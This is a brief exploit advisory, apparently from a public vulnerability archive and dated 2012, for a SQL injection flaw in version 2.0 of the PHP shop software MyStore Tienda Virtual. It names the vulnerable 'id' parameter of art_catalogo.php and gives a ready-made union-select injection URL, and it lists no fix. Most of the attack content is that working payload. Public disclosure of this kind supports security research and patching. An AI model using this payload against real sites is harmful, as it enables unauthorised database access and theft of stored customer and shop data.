MyStore Tienda Virtual SQL Injection Vulnerability

2012-01-03 00:15:05

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

~ SQL Injection MyStore Tienda Virtual ~

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

[+] Autor: easy laster

[+] Vulnerabilities [ SQL Injection ]

[+] Page: http://www.mystore.com.mx/

[+] Language: [ PHP ]

[+] Version: 2.0

[+] Date: 03.01.2012

[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability

art_catalogo.php?id=


[+] Exploitable

http://[host]/[path]/art_catalogo.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11--+

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.